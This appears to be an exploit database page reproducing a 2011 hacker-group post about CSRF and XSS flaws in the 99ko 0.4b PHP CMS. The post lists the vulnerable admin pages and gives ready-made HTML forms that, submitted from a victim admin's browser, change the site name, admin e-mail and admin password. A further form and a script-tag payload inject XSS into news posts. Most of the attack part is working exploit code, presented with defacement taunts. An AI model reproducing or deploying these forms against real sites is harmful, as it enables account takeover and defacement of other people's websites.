Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormKedAns-DzPACKETSTORM:101540
HistoryMay 19, 2011 - 12:00 a.m.

99ko 0.4b Cross Site Request Forgery

2011-05-1900:00:00
KedAns-Dz
packetstormsecurity.com
23
JSON
`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KedAns-Dz member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
###  
# Title : 99ko <= 0.4b Multiple (CSRF/XSRF) Vulnerabilities  
# Author : KedAns-Dz  
# E-mail : [email protected] ([email protected]) | [email protected]  
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)  
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com  
# Twitter page : twitter.com/kedans  
# platform : php  
# Impact : Remote Cross-Site Request Forgery  
# Tested on : Windows XP sp3 FR & Linux.(Ubuntu 10.10) En  
###  
# (~) Greetings To : Caddy-Dz (+) JaGo-Dz (+) Dr.Ride (+) All My Friends   
###  
  
# The Vulnerabilities In [ADMIN Dir] Pages  
  
+> All This Page Can Able Accept a Remote Cross-Site Request Forgery :  
../admin/config.php  
../admin/news_edit.php  
../admin/page_edit.php  
  
# (!) Exploit & PoC :  
  
#=(1)======[Change WebSiet Settings/Confige ]=======>  
  
<h2>Configuration CSRF/XSRF (By Inj3ct0r Team)</h2>  
<form method="post" action="http://[target]/?admin/config,save"><p>  
<label>Site Name : </label><br />  
<input type="text" name="nom_site" value="HaCked By KedAns-Dz" /><br /></div>  
</select><br /></div>  
<div class="elem"><label>Site Description :</label><br />  
<textarea style="width:100%;height:50px;" name="desc_site"></textarea><br /></div>  
<div class="elem_enligne"><label>News Number :</label><br />  
<input type="text" name="mod_news_nb_last" value="" /><br /></div>  
<div class="elem_enligne"><label>Admin E-mail :</label><br />  
<input type="text" name="email_admin" value="[email protected]" /><br /></div>  
<div class="elem"><label>New Admin Password :</label><br />  
<input autocomplete="off" type="text" name="mdp_admin" value="" /> <i>( 6 minimum )</i><br /></div>  
<input type="submit" value="Enregistrer" /></p>  
</form>  
  
  
#=(2)======[Remte XSS Attack ]=======>  
  
<h2>XSS Attack :</h2>  
<form method="post" onsubmit="instance.post();" action="http://[target]/?admin/news,save">  
<input type="hidden" name="id" value="" /><p>  
<div class="elem_enligne"><label>Titre</label><br />  
<input type="text" name="nom" value="<script>alert('1337->XSS<-KedAns');</script>" /><br /></div>  
<div class="elem"><label>Contenu</label><br />  
<textarea id="wysiwyg" name="contenu">XSS Code</textarea><br /></div>  
<input type="submit" value="Enregistrer" /></p>  
</form>  
  
+> Or in Page > http://[target]/?admin/news < Add The XSS Code in Title And Content Page (in Source)  
Exp XSS :<script>alert('1337->XSS<-KedAns');</script>  
  
# (^_^) ! Good Luck ALL ...  
  
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================   
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > Islampard + Z4k1-X-EnG + Dr.Ride  
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)   
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu  
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... * Str0ke  
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)  
# JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org)  
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...  
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-  
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever   
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm  
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz  
#================================================================================================  
`
JSON